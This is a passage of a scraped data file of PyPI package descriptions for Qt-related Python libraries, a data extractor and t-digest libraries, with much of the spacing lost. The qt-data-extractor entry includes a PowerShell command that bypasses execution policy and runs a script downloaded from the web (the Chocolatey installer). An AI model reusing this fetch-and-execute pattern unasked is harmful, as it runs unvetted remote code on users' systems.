Codes"} +{"package": "qt-collapsible-section-pyside6", "pacakge-description": "No description available on PyPI."} +{"package": "qt-colored-logger", "pacakge-description": "!!!ATTENTION!!! In connection with the increase in capabilities and functionality, the library has changed its name! It is now calledMighty Logger. This repositoryis no longer maintained by the author!Qt_\u0421olored-loggerContentQt_\u0421olored-loggerContentPreambleOverviewImportant releasesLICENSEInstallationUsageAdditional functionalityDataTroubleshootingAuthorsPreambleI often came across the opinion that it is better to use not standard output to the console, but full-fledged logging... However, the standard libraries do not provide exactly what I need... Therefore, I decided to make my own library! Which will implement the functionality I need.I was inspired by thecolored-logslibrary.ContentOverviewThe library implements the formation of a beautifully formatted colored text, similar to a log, which has all the necessary information:Device name and registered profile, system name, etc. (this data is displayed only once at the beginning of the logging)Log entry timeLog entry statusDescription of the log entry statusLog entry typeEntry messageAny information to the output can be turned off (according to the default, everything is included). It is also possible to change the output settings during the logging process. It is possible to change the colors of the foreground text and the background.ContentImportant releasesSee the important releases (possible spoilers)v0.1.0 - First official release (complete basic HTML logger)v0.2.0 - Structural update (added basic console logger with HTML base)v0.3.0 - Background update (added background for log entries)v0.4.0 - Buffer update (added text buffer)v0.5.0 - PROJECT NAME CHANGED!!!ATTENTION!!! In connection with the increase in capabilities and functionality, the library has changed its name! It is now calledMighty Logger. This repositoryis no longer maintained by the author!ContentLICENSEThe full text of the license can be found at the followinglink.Copyright \u00a9 2023 Kalynovsky Valentin. All rights reserved.Licensed under the Apache License, Version 2.0 (the \"License\");\nyou may not use this file except in compliance with the License.\nYou may obtain a copy of the License athttp://www.apache.org/licenses/LICENSE-2.0Unless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions andContentInstallationDespite the fact that the library was originally developed for use in PyQt, it does not require PyQt to be installed, since this framework for outputting to Text fields, which support not only Plain Text, uses HTML and this library simply simplifies the logging process, since the creation process already formatted strings is registered in this library.!!!ATTENTION!!! In connection with the increase in capabilities and functionality, the library has changed its name! It is now calledMighty Logger. This repositoryis no longer maintained by the author!To install the library, enter the command:pipinstallqt-colored-loggerUsageThis is the simplest example of using the library:fromqt_colored_logger.textimportTextBufferfromqt_colored_logger.loggerimportLoggerif__name__==\"__main__\":buf=TextBuffer(115)logger=Logger(program_name=\"Test\",text_buffer=buf)logger.MESSAGE(status_message_text=\"OK\",message_text=\"Outputting the message\")The outputs in console will contain the following text (GitHub, PyPi and possibly some other sites do not support displaying colors in Markdown - use resources that support them, such as PyCharm):-Test?entry> $\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588^\u2588\u2588\u2588\u2588@\u2588\u2588\u2588\u2588\u2588\u2588\u2588:\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588:\u2588\u2588\u2588\u2588\u2588:\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588:\u2588\u2588\u2588\u2588\u2588-?entry>*2023-04-09 12:37:07.198496#STATUS:OK@MESSAGE -Outputting the messageSee the USAGING.md file for more details.ContentAdditional functionality!!!ATTENTION!!! In connection with the increase in capabilities and functionality, the library has changed its name! It is now calledMighty Logger. This repositoryis no longer maintained by the author!ContentDataSee the DATA.md file.ContentTroubleshooting!!!ATTENTION!!! In connection with the increase in capabilities and functionality, the library has changed its name! It is now calledMighty Logger. This repositoryis no longer maintained by the author!All functionality of the library has been tested by me, but if you have problems using it, the code does not work, have suggestions for optimization or advice for improving the style of the code and the name - I invite youhereandhere.ContentAuthorsKalynovsky Valentin\"Ideological inspirer and Author\""} +{"package": "qt-command-palette", "pacakge-description": "qt-command-paletteA command palette widget for Qt applications.\nThis module provides a Pythonic way to register command actions to any Qt widgets.Installationpip install qt-command-paletteUsageRegister functions usingregisterfunction.fromqt_command_paletteimportget_palette# create command palette instance (with optional app name as an argument)palette=get_palette(\"myapp\")# prepare a command groupgroup=palette(\"Command group 1\")# This function will be shown as \"Command group 1: run_something\"@group.registerdefrun_something():...# This function will be shown as \"Command group 1: Run some function\"@group.register(desc=\"Run some function\")defrun_something():...Install command palette into Qt widget.# instantiate your own widgetqwidget=MyWidget()# install command palette, with optional shortcutpalette.install(qwidget,\"Ctrl+Shift+P\")qwidget.show()"} +{"package": "qtcompat", "pacakge-description": "qtcompatA compatibility package to allow usage of PySide2, PyQt5 or PySide6\nin Python applications. It has been written\ninOGSto allow our Python applications written in PyQt4 / PySide to migrate slowly\nto PyQt5 / Pyside2 and PySide6.Install qtcompatRun command:pip3 install qtcompatFor the bleeding edge install with:pip3 install git+https://bitbucket.org/bvidmar/qtcompatUsageWhen writing a new package import all the modules required by it in\nitsinit.py file:from qtcompat import (Signal, QtCore, Qt, QtGui, QtWidgets, LIB, \n QAction, QShortcut)and then import only the Qt modules needed by every new module from .To write a single scrpit simply import the required modules fromqtcompat:from qtcompat import QtCore, QtGui, QtWidgetsWrite applications using:- QtCore\n- QtGui\n- QtWidgets\n- QtOpenGL\n- Signal\n- Slot\n- Property\n- QOpenGLWidget\n- QGLFormat\n- QAction\n- QShortcut\n- Qt (shortcut for QtCore.Qt)and the application will work with any of PySide2, PyQt5 or PySide6.If more than one of these packages are installedqtcompatwill pick\nthe first one available inthisorder. To change this behaviour set the environment\nvariableQT_PREFERRED_LIB=PyQt5orQT_PREFERRED_LIB=PySide6The selected package name will be available in the LIB attribute ofqtcompat.Who do I talk to?Roberto VidmarNicola Creati"} +{"package": "qtconfig", "pacakge-description": "QConfigQConfig is a useful tool for PyQt GUI developers, as it makes it easier to save and load the state of the GUI through configuration files. This tool simplifies the process of preserving the current state of the GUI, and provides a range of helpful methods for managing configuration, making it a convenient and efficient solution.How to installQConfig is available on pypi and can be installed via pip.pipinstallqtconfigIntroductionThe concept behind the package is aQConfigcontainer that takes responsibility for a dictionary of data. Each key in the dictionary gets aHookassigned, which maps the value to its widget.For datasets with keys that do not match the widget names, aQConfigDynamicLoadercan be created, mapping each value to its widget, and then passed to theQConfigconstructor. It is also able to receive a list of keys instead and look for the closest matching widget name.FeaturesLoad all the values aQConfigis responsible for from their hooked widgetsPopulate all the widgets with the values aQConfigs' data holdsAdd callbacks to the widgets aQConfigholdsRemove specific / all callbacks aQConfigholdsTrigger a \"save on change\" for all widgets aQConfigholdsDynamically map config keys to non matching widget object namesSuppress expected errors while trying to buildQConfigDynamicLoaderorQConfigLoad or read datasets recursively to allow for nested configsConvertstrfrom config intoQDateobjectsWhy should you use it?Preserving the state of a GUI in files such as json, yaml or xml yourself can be tedious and results in a lot of boilerplate code. Each widget needs to be connected to the data that holds its value and vice versa, you need to add callbacks to all widgets to invoke a save (unless you want to use a save button or timer) and it takes alot of time, increases the amount of code and increases the risk of getting something wrong. QConfig uses a more sophisticated method of handling the configs for you and allows you to focus on your GUI design rather than worrying about preserving its state.UsageQConfig is very lightweight and intuitive to use, more-so when the configs keys already match the widget names.With matching key - widget pairsThe most straightforward way to use QConfig is to ensure that your configuration keys match the widget names in your GUI. Assuming we have the following structure:user_data:dict[str,Any]={\"user_name\":\"Jake\",\"age\":18,\"of_age\":True,\"IQ\":10}widgets:list[QWidget]=[user_name_widget,age_widget,of_age_checkbox,iq_spinbox]Assuming that eachwidget.objectName()matches the key it is hooked to in the configs, you can create a QConfig just like this:user_data_qconfig=QConfig(user_data,widgets,recursive=False)With QConfigDynamicLoaderThe QConfigDynamicLoader allows you to dynamically hook a dataset to the widgets even if the keys dont match, by guiding the loader to the widget to search for.\nTaking the above example:user_data:dict[str,any]={\"user_name\":\"Jake\",\"age\":18,\"of_age\":True,\"IQ\":10}widgets:list[QWidget]=[user_name_widget,age_widget,of_age_checkbox,iq_spinbox]Assuming theobjectName()properties ofuser_name_widgetandage_widgetwere actually\"user\"and\"age\"instead, we could create a QConfigDynamicLoader to account for this:loader=QConfigDynamicLoader({\"user_name\":\"user\",\"age_widget\":\"age\"},show_build=True)user_data_qconfig=QConfig(user_data,widgets,loader,recursive=False)AQConfigDynamicLoaderis also able to automatically complement keys by close matches, either keys missing in the data or passed as a list. If part of your keys already match with the widget names, they do not need to be added to the loader, the QConfig will find them before accessing the loader.FeaturesUpon initialisation, it will build hooks that connect each key to its respective widget. Now we can use the qconfig object to......populate the hooked widgets with the values in the datauser_data_qconfig.load_data()...save the values in the widgets in its key in the datauser_data_qconfig.get_data()...connect callback methods to each widget's change event. With this method when a value in a widget is changed, all the settings will be written to the data right upon changeuser_data_qconfig.connect_callback(user_data_qconfig.save_data)...disconnect the callbacks, remove a specified callback by passing one, otherwise all callbacks are disconnecteduser_data_qconfig.disconnect_callback(exclude=[\"user_name\"])"} +{"package": "qtconsole", "pacakge-description": "Jupyter QtConsoleA rich Qt-based console for working with Jupyter kernels,\nsupporting rich media output, session export, and more.The Qtconsole is a very lightweight application that largely feels like a terminal, but\nprovides a number of enhancements only possible in a GUI, such as inline\nfigures, proper multiline editing with syntax highlighting, graphical calltips,\nand more.Install QtconsoleThe Qtconsole requires Python bindings for Qt, such asPyQt6,PySide6,PyQt5orPySide2.Althoughpipandcondamay be used to install the Qtconsole, conda\nis simpler to use since it automatically installs PyQt5. Alternatively,\nthe Qtconsole installation with pip needs additional steps since pip doesn't install\nthe Qt requirement.Install using condaTo install:conda install qtconsoleNote:If the Qtconsole is installed using conda, it willautomaticallyinstall the Qt requirement as well.Install using pipTo install:pip install qtconsoleNote:Make sure that Qt is installed. Unfortunately, Qt is not\ninstalled when using pip. The next section gives instructions on doing it.Installing Qt (if needed)You can install PyQt5 with pip using the following command:pip install pyqt5or with a system package manager on Linux. For Windows, PyQt binary packages may be\nused.Note:Additional information about using a system package manager may be\nfound in theqtconsole documentation.More installation instructions for PyQt can be found in thePyQt5 documentationandPyQt4 documentationSource packages for Windows/Linux/MacOS can be found here:PyQt5andPyQt4.UsageTo run the Qtconsole:jupyter qtconsoleResourcesProject Jupyter websiteDocumentation for the Qtconsolelatest version[PDF]stable version[PDF]Documentation for Project Jupyter[PDF]IssuesTechnical support - Jupyter Google Group"} +{"package": "qtcurate", "pacakge-description": "Quantxt Theia Python client libraryThe officialQuantxtPython client library.Theia is a fully managed document extraction software. User needs to first configure the fields that they want to extract. Theia guarantees correct extraction of data if the fields are configured properly. Fields can be embedded in plain text, within tables or within forms.Theia can process documents in various formats including PDF, TIFF, PNG, JPEG, TSV, TXT and Ms Excel. Scanned documents are automatically detected and run through OCR before extraction.InstallationRequirementsPython 3.6 or laterInstallationpip install qtcurateRefer to theSamplesfor examplesOfficial documentationContact us atsupport@quantxt.comfor API key or technical questions."} +{"package": "qt-custom", "pacakge-description": "Custom Qt Classes"} +{"package": "qt-custom-widgets", "pacakge-description": "QT-PyQt-PySide-Custom-WidgetsAwesome custom widgets made for QT Desktop Applications. Simplify your UI development process. These widgets can be used in QT Designer then imported to PySide code.InstallationFirst time installer:pip install QT-Custom-WidgetsUpgrade/install the latest version:pip install --upgrade QT-Custom-WidgetsInstallation TestingRun the following code to see if the installation was successful.# Run this from your terminal or create a python file,# paste this code, then runfromCustom_Widgets.ProgressIndicatorimporttesttest.main()You should see the following interface:How to use it.Read the full documentation plus video guideshereWatch the tutorial videos hereWhat is new?Version 0.6.2:Added support for loading multipleJSON StylesheetsBy default, the json file namedstyle.jsonwill be loaded, so no need to specify. The file must me inside the root directory of your project,jsondirectory, orjsonstylesdirectory inside your project folder for it to be automatically loaded.If you have multiple JSON stylesheet files, then you can apply them to your GUI like this:######################################################################### APPLY JSON STYLESHEET######################################################################### self = QMainWindow class# self.ui = Ui_MainWindow / user interface classloadJsonStyle(self,self.ui,jsonFiles={\"mystyle.json\",\"mydirectory/myJsonStyle.json\"})########################################################################This feature is helpful especially when you have multiple windows files that will share only some parts of the stylesheet shuch app app title, settings etc.Toggle logs:\nYou can now switch app logs on or off.\nThis can be done from a python file:# Show Logsself.showCustomWidgetsLogs=True# Hide Logsself.showCustomWidgetsLogs=FalseFrom the JSON file:{\"ShowLogs\":true,{\"ShowLogs\":false,Sample ImagesAnalog Gauge WidgetResponsive Animated GUIAnimated QStacked Widget"} +{"package": "qtdata", "pacakge-description": "qtdataqtdata\u662f\u7531\u4e2a\u4eba\u6253\u9020\u7684\u7528\u4e8e\u83b7\u53d6A\u80a1\u3001\u6e2f\u7f8e\u80a1\u3001\u671f\u8d27\u3001\u533a\u5757\u94fe\u6570\u636e\u7684\u514d\u8d39\u5f00\u6e90 Python \u5e93\uff0c\u5b83\u7edf\u4e00\u9002\u914d\u5404\u79cd\u91cf\u5316\u6570\u636e\u6e90\uff0c\u8f93\u51fapandas\u683c\u5f0f\u6570\u636e\uff0c\u65e2\u53ef\u4ee5\u76f4\u63a5\u4f7f\u7528\uff0c\u4e5f\u53ef\u4ee5\u4ece\u672c\u5730\u884c\u60c5\u6570\u636e\u5e93\u5b58\u53d6\uff0c \u4f7f\u7528\u5b83\u4f60\u53ef\u4ee5\u5f88\u65b9\u4fbf\u5730\u83b7\u53d6\u6570\u636e\u800c\u4e0d\u7528\u5bf9\u63a5\u5404\u79cd\u6570\u636e\u6e90\u3002\u80cc\u666f\u91cf\u5316\u6570\u636e\u6e90\u4f17\u591a\uff0c\u53c2\u8003https://github.com/rchardzhu/awesome-quant-cn\u91d1\u878d\u6570\u636e\u662f\u91cf\u5316\u7684\u57fa\u7840\uff0c\u6ca1\u6709\u6570\u636e\u91cf\u5316\u5c31\u65e0\u4ece\u4e0b\u624b\u3002\u968f\u7740\u884c\u4e1a\u7ade\u4e89\u52a0\u5267\uff0c\u91cf\u5316\u5bf9\u9ad8\u8d28\u91cf\u2014\u66f4\u5feb\u66f4\u5168\u66f4\u51c6\u6570\u636e\u7684\u8981\u6c42\u66f4\u9ad8\uff0c\u6bd5\u7adf\u641e\u91cf\u5316\u4e0d\u80fd\u8f93\u5728\u8d77\u8dd1\u7ebf\u4e0a\u3002\n\u5404\u79cd\u6570\u636e\u6e90\u683c\u5f0f\u5404\u4e0d\u76f8\u540c\uff0cqtdata\u5e0c\u671b\u80fd\u591f\u628a\u5404\u79cd\u6570\u636e\u6e90\u7edf\u4e00\u8d77\u6765\uff0c\u5927\u5bb6\u53ea\u9700\u8981\u6309\u7167qtdata lib\u5e93\u5c31\u597d\u3002\nqtdata\u9884\u8ba1\u5b9e\u73b0\u7684\u529f\u80fd\uff1a\u9002\u914d\u5404\u7c7b\u6570\u636e\u6e90\uff0c\u5bf9\u91cf\u5316\u611f\u5174\u8da3\u7684\u540c\u5b66\u53ea\u4f7f\u7528\u4e00\u5957\u4ee3\u7801\u5e93\u5c31\u53ef\u4ee5\u4f7f\u7528\u5404\u79cd\u6570\u636e\u8f93\u51fa\u4e3apandas\u683c\u5f0f\uff0c\u65b9\u4fbf\u76f4\u63a5\u4f7f\u7528\u53ef\u4ee5\u5b58\u50a8\u5230\u672c\u5730\u884c\u60c5\u5e93\uff0c\u4e5f\u53ef\u4ee5\u4ece\u672c\u5730\u884c\u60c5\u5e93\u8bfb\u53d6\u5b89\u88c5\u901a\u8fc7pip\u5b89\u88c5pipinstallqtdata\u901a\u8fc7pip\u66f4\u65b0pipinstallqtdata--upgrade\u91cf\u5316\u6570\u636e\u6e90\u5206\u7c7b\u91cf\u5316\u6570\u636e\u6e90\u5206\u4e3a\u5982\u4e0b\u51e0\u79cd\uff1a \u5f00\u6e90\u91cf\u5316\u6570\u636e\u3001\u5238\u5546/\u91cf\u5316\u4ea4\u6613\u5e73\u53f0\u63d0\u4f9b\u7684\u6570\u636e\u6e90\u3001\u4e13\u4e1a\u6570\u636e\u670d\u52a1\u516c\u53f8\u548c\u81ea\u5df1\u6293\u53d6\u6e05\u6d17\u51e0\u79cd\u65b9\u5f0f\u3002\u5f00\u6e90\u91cf\u5316\u6570\u636e\uff1a\u901a\u8fc7\u6293\u53d6\u5404\u7c7b\u8d22\u7ecf\u7f51\u7ad9\u6216\u516c\u5f00\u7684\u91d1\u878d\u6570\u636e\uff0c\u8fdb\u884c\u6e05\u6d17\u52a0\u5de5\u5b58\u50a8\u540e\u5f00\u653e\u51fa\u6765\uff0c\u4e3a\u91cf\u5316\u5b66\u4e60\u8005\u63d0\u4f9b\u91d1\u878d\u6570\u636e\u9700\u6c42\u3002 \u5982BaoStock, tushare, akshare, yfinance, easyquotation, efinance\u5238\u5546/\u91cf\u5316\u4ea4\u6613\u5e73\u53f0\uff1a \u805a\u5bbd\u6570\u636eJQData, rqdata, tqsdk, futu\u4e13\u4e1a\u6570\u636e\u670d\u52a1\u516c\u53f8\uff1a\u4e07\u5f97Wind Data Service\u6570\u636e\u670d\u52a1, ifind, choice\u6570\u636e, \u5f6d\u535abloomberg\u6570\u636e\u670d\u52a1\u81ea\u5df1\u6293\u53d6&\u6e05\u6d17\u6570\u636e\uff1a\u7f16\u7a0b\u80fd\u529b\u597d\u4e14\u6709\u65f6\u95f4\u7684\u670b\u53cb\uff0c\u4e5f\u53ef\u4ee5\u81ea\u5df1\u6293\u53d6\u548c\u6e05\u6d17\u6570\u636e\u3002\u597d\u5904\u662f\u6570\u636e\u8d28\u91cf\u6709\u4fdd\u969c\uff0c\u53ef\u4ee5\u6309\u7167\u81ea\u5df1\u8981\u6c42\u6765\u8fdb\u884c\u5904\u7406\uff1b\u7f3a\u70b9\u662f\u5bf9\u7f16\u7a0b\u80fd\u529b\u6709\u4e00\u5b9a\u8981\u6c42\uff0c\u4e14\u6bd4\u8f83\u8d39\u65f6\u95f4\u4eba\u529b\u3002\u6bd4\u8f83\u5e38\u89c1\u7684\u662f\u5bf9\u7279\u5b9a\u6570\u636e\u5f53\u4e0a\u9762\u7684\u6570\u636e\u6e90\u65e0\u6cd5\u8986\u76d6\u65f6\uff0c\u53ef\u4ee5\u81ea\u5df1\u6293\u53d6\u8865\u5145\u3002\u4ea4\u6d41\u73b0\u5728\u5404\u79cd\u91cf\u5316\u6570\u636e\u6e90\u4e94\u82b1\u516b\u95e8\uff0c\u53d1\u73b0\u5f88\u591a\u670b\u53cb\u5bf9\u8fd9\u5757\u4e0d\u662f\u5f88\u6e05\u695a\uff0c\u4e2a\u4eba\u4e5f\u5728\u4e0a\u9762\u82b1\u4e86\u4e0d\u5c11\u65f6\u95f4\uff0c\u5e0c\u671b\u80fd\u8ddf\u5927\u5bb6\u4e00\u8d77\u5171\u540c\u4f18\u5316qtdata\uff0c\u611f\u5174\u8da3\u7684\u670b\u53cb\u53ef\u4ee5\u52a0\u7fa4\u4e00\u8d77\u4ea4\u6d41\u3002 \u5173\u6ce8\u516c\u4f17\u53f7\u83b7\u53d6\u9080\u8bf7\u94fe\u63a5\uff0c\u5fae\u4fe1\u516c\u4f17\u53f7\uff1a\u8bf8\u845b\u8bf4talk\n\u52a0\u7fa4\u798f\u5229\uff1a\u53ef\u4ee5\u4e00\u8d77\u4ea4\u6d41\u60f3\u6cd5\u53ef\u4ee5\u4e00\u8d77\u8d21\u732e\u4ee3\u7801\u53ef\u4ee5\u4f18\u5148\u5f00\u53d1\u60f3\u8981\u7684\u529f\u80fd\u53ef\u4ee5\u89e3\u51b3\u6280\u672f\u96be\u9898"} +{"package": "qt-data-extractor", "pacakge-description": "Industrial Data ExtractorIndustrial Data Extractor is an open-source Windows application to extract process data from industrial systems\nand historians.The following systems are currently supported:Osisoft PIIt supports browsing and selecting tags on the target system and extract periods of data into zipped CSVs.InstallationPlease usehttps://github.com/imubit/qt-data-extractor/releasesto download the latest version of the extractor.If you would like to extract data from Osisoft PI historian (which is the only one supported at this point). Please\nmake sure you havePI SDKand AF SDK installed and configured on your workstation.Getting StartedConfigure the target historian usingServerdrop down.Using left panel filter editor to browse for tags or import an Excel sheet with a list of tags.Select tags you would like to extract on left panel and add then to the right panel withAdd to Selected Tagsbutton.Select a period to be extracted and sample rate (useRaw Dataoption to extract the original sample rate that is stored within the historian).SelectSave Directoryin which your archive will be populated.ClickExtractand confirm your selection.Wait until extraction is finished.DevelopmentPython Installpipinstallqt-data-extractorRunning under CLIPS C:\\> qt-data-extractorIf the application is not starting this way, Python Scripts directory is probably not in the PATH. In this case you can run the script from Python installation directory (i.e.c:\\Python\\Python39\\Scripts\\qt-data-extractor.exe)Building Windows Executablepipxruntox-ewinexeBuilding MSI InstallerInstall environmentSet-ExecutionPolicy Bypass -Scope Process -Force; [System.Net.ServicePointManager]::SecurityProtocol = [System.Net.ServicePointManager]::SecurityProtocol -bor 3072; iex ((New-Object System.Net.WebClient).DownloadString('https://community.chocolatey.org/install.ps1'))\nchoco install -y go-msiBuild MSIgo-msi make --msi dist\\windows-msi\\ --version 0.1.1"} +{"package": "qt-dataflow", "pacakge-description": "This package tries to provide components for building your own\nvisual programming environment. The authors aim is to make his\ndata analysis tool available to his colleagues who don\u2019t\nknow programming or Python.Because a standard gui is not very flexible, this projects tries\nto make visual canvas on which the dataflow can be defined and modified.\nExtensibility is given through simply adding or modifying Nodes.This project is inspired by Orange - where i did not see an easy way to just\nuse the canvas part (also: license differences). Also the design tries\nto be more flexible.RequirementsIt is made with Python 2.7. Not tested for lower versions or\nPython 3 (patches welcome). It should work with PySide and PyQt,\nbut at the moment, the imports need to be manually changed.The examples may have additional requirements:numpymatplotlibpyqtgraphExamplesSee example.py for an simple example using icons which react to double click.\nTo make a connection draw from one nodes termial to another\n(only out-> in is allowed).example_widget uses widgets on the canvas directly, it also implements\na simple callback. Note how the label updates after changing the\nSpinBox-value.example_pyqtgraph need also the pyqtgraph package. It plot directly on the\ncanvas.example_matplotlib_on_canvas does the same, but uses matplotlib via\na temporary file.Code ExampleTo make custom nodes you need to subclass Node. It must return\na NodeView via its \u2018get_view\u2019 method. The following example\nimplements a Node which make a random number.classRandomNumber(Node):\"\"\"\n A test node which outputs a random number. Widget allow to set the number.\n \"\"\"def__init__(self):super(DataGenNode,self).__init__()#Node type/nameself.node_type='Random Array'#Icon_path is needed for the PixmapNodeViewself.icon_path='icons/onebit_11.png'#The makes the node have an output terminal.self.generates_output=Truedefget_view(self):returnPixmapNodeView(self)defget(self):#Method which can be called by other nodes. The name is just#a convention.num=[random.random()foriinrange(self.num_points)]returnnumdefshow_widget(self):#Method called by double clicking on the icon.int,ok=Qt.QtGui.QInputDialog.getInteger(None,'Input Dialog','Number of Points',self.num_points)ifok:self.num_points=intA node saves its connections in node.in_conn and node.out_conn. Also\nnote, that each node view must be a child of a QGraphicsItem and NodeView.StructureIn model the base Node- and Schema-classes are found. In view are some\nview available. gui contains some additional ready to use elements.Todoadd different icons (simple)nicer toolbar (drag-n-drop would be nice)test persistence, define a stable protocol if pickling does not workmake an example with less requirements.checking and introducing a connection typemove some logic for allowing or denying connections\nfrom SchemaView to the NodeView.checking and improving compatibility with different Python versions.better documentationmake number of terminals variable.\u2026Coding StyleThis projects tries to follow PEP8.LicenseExample icons are fromhttp://www.icojam.com/blog/?p=177(Public Domain).BSD - 3 clauses, see license.txt."} +{"package": "qtdata-setupserver-and-tool", "pacakge-description": "No description available on PyPI."} +{"package": "qtdatasetviewer", "pacakge-description": "Qt Dataset ViewerThis module is for debugging ML projects. It is PyQt5 based viewer for torch.utils.dataset.InstallationUse the package managerpipto installqtdatasetviewerfrom PyPi.pipinstallqtdatasetviewerUsageimportsysfromglobimportglobfromdatasetimportSampleDatasetfromPyQt5.QtWidgetsimportQApplicationfromPILimportImagefromqtdatasetviewer.abstract_convert_to_pilimportAbstractConvertToPilfromqtdatasetviewer.qt_dataset_viewerimportrun_qt_dataset_viewerimporttorchvision.transformsasTclassConvert(AbstractConvertToPil):defconvert(self,item)->Image:image,mask=itemtransform=T.ToPILImage()returntransform(image)if__name__==\"__main__\":dataset=SampleDataset(files=glob(\"data/*.*\"))run_qt_dataset_viewer(Convert(dataset))DisclaimerThe package and the code is provided \"as-is\" and there is NO WARRANTY of any kind.\nUse it only if the content and output files make sense to you."} +{"package": "qt-desktop-translate", "pacakge-description": "qt-desktop-translateqt-desktop-translate allows translating .desktop files using .ts files from Qt.InstallationInstall qt-desktop-translate with pippip install qt-desktop-translateCreate translationsTo create translations, use desktop-lupdatedesktop-lupdate your_desktop_file.desktop your_ts_file.tsThis will add the fields from the .desktop file to the .ts file. Now you can use Qt Linguist or any other tool, that allows translating .ts files. Call desktop-lupdate everytime after you've ran the normal lupdate. You can specify a folder instead of a single .ts file.Apply translationsTo apply translations, use desktop-lreleasedesktop-lrelease your_desktop_file.desktop output.desktop your_ts_file.tsThis will translate desktop-lupdate your_desktop_file.desktop using the translations from your_ts_file.ts. The output will be written into output.desktop. You can specify a folder instead of a single .ts file."} +{"package": "qt-dev-helper", "pacakge-description": "Qt Dev HelperToolbox to help develop Qt applications, improving the usability of the existing tooling.Installationpip install qt-dev-helperORconda install -c conda-forge qt-dev-helperFeaturesUsable as Library and/or CLI toolCompatible withPEP517build system\n(see test case)CLI auto completionProject wide configuration inpyproject.tomlRecursive asset compiler for Qt projects (usinguicandrcc):*.ui->*.py*.qrc->*.py*.ui->*.h*.qrc->*.h*.scss->*.qssSupport for multiple Qt tooling suppliersPySide6-Essentialsqt6-applicationsqt5-applicationsAbility to open all files in a folder in QtDesignerPlanned featuresStand alone executable for each release (Windows)File watch modeqssinjection into*.uifilespre-commithooksFAQQ: Why isPyQt5not supported?A:PyQt5only ships a python specific version ofuicandrccbreaking the tool API and\ncompatibility with cpp projects.\nUse the matching version ofqt5-applicationsas Qt tooling supplier.Contributors \u2728Thanks goes out to these wonderful people (emoji key):Sebastian Weigand\ud83d\udcbb\ud83e\udd14\ud83d\udea7\ud83d\udcc6\ud83d\ude87\u26a0\ufe0f\ud83d\udcd6Joris Snellenburg\ud83d\udc40This project follows theall-contributorsspecification. Contributions of any kind are welcome!"} +{"package": "qtdigest", "pacakge-description": "qtdigestpython implementation of Dunning's T-Digest, inspired bynodejs tdigestInstallpipinstallqtdigestUsagefromqtdigestimportTdigestt=Tdigest()foriinxrange(1000):t.push(random())P90=t.percentile(0.9)print'P90 = ',P90APITdigest(delta=0.01, K=25, CX=1.1)delta: the compression factor, the max fraction of mass that can be owned by one centroid (bigger, up to 1.0, means more compression).K: a size threshold that triggers recompression as the TDigest grows during inputCX: specifies how often to update cached cumulative totals used for quantile estimation during ingest.return: Tdigest instanceInstance of Tdigestpush(x, n): add data with value x and weight nsize(): return the count of centroidstoList(): return the list of all centroids datapercentile(p): return the percentage of p(0..1)serialize(): serialize tdigest instance to string, ie:0.01~25~2~0.00064~0.0013~2~20simpleSerialize(): simply serialize tdigest instance to string, ie:0.00064~2~0.0013~20deserialize(serialized_str): deserialize the serialized string to tdigest instance. it is a classmethod, so can be called byTdigest.deserialize(serialized_str)Performanceplatform\uff1a MacBook Pro (2.6 GHz Intel Core i5)data size (push times)cost time1K0.07s10K0.2s100K1.7s1M17s"} +{"package": "qtdigest-cffi", "pacakge-description": "t-digest CFFIt-digestis a data structure\nfor accurate on-line accumulation of rank-based statistics such as\nquantiles and trimmed means, designed byTed\nDunning.The t-digest construction algorithm uses a variant of 1-dimensional\nk-means clustering to produce a data structure that is related to the\nQ-digest. This t-digest data structure can be used to estimate quantiles\nor compute other rank statistics. The advantage of the t-digest over the\nQ-digest is that the t-digest can handle floating point values while the\nQ-digest is limited to integers. With small changes, the t-digest can\nhandle any values from any ordered set that has something akin to a\nmean. The accuracy of quantile estimates produced by t-digests can be\norders of magnitude more accurate than those produced by Q-digests in\nspite of the fact that t-digests are more compact when stored on disk.This package provides tested, performant, thread-safePython 3CFFI\nbindings to an adapted implementation of t-digest byUsman\nMasoodoriginally written forredis-tdigest.InstallationYou can install this package usingpipor the includedsetup.pyscript:# Using pip\npip install tdigest-cffi\n\n# Using setup.py\npython setup.py installUsagefromtdigestimportTDigest,RawTDigest# Thread-safe instance with default compression factordigest=TDigest()# Raw instance with default compression factordigest=RawTDigest()# Thread-safe instance with a custom compression factordigest=TDigest(compression=500)# Digest compressioncompression=digest.compression# Digest weightweight=digest.weight# Centroid countcentroid_count=digest.centroid_count# Compression countcompression_count=digest.compression_count# Insertion with unit weightdigest.push(1000)# Insertion with custom weightdigest.push(1000,2)# 99th percentile calculationquantile=digest.quantile(0.99)percentile=digest.percentile(99)# Cumulative distribution functioncdf=digest.cdf(1000)# P(X <= 1000)# Centroid extractionforcentroidindigest.centroids():print(centroid.mean,centroid.weight)# Digest mergingother=TDigest()other.push(42)digest.merge(other)LicenseBSD 3-Clause License\n\nCopyright (c) 2018, Phil Demetriou\nAll rights reserved.\n\nRedistribution and use in source and binary forms, with or without\nmodification, are permitted provided that the following conditions are met:\n\n* Redistributions of source code must retain the above copyright notice, this\n list of conditions and the following disclaimer.\n\n* Redistributions in binary form must reproduce the above copyright notice,\n this list of conditions and the following disclaimer in the documentation\n and/or other materials provided with the distribution.\n\n* Neither the name of the copyright holder nor the names of its\n contributors may be used to endorse or promote products derived from\n this software without specific prior written permission.\n\nTHIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\"\nAND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE\nIMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE\nDISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE\nFOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL\nDAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR\nSERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER\nCAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,\nOR TORT (INCLUDING NEGLIGENCE 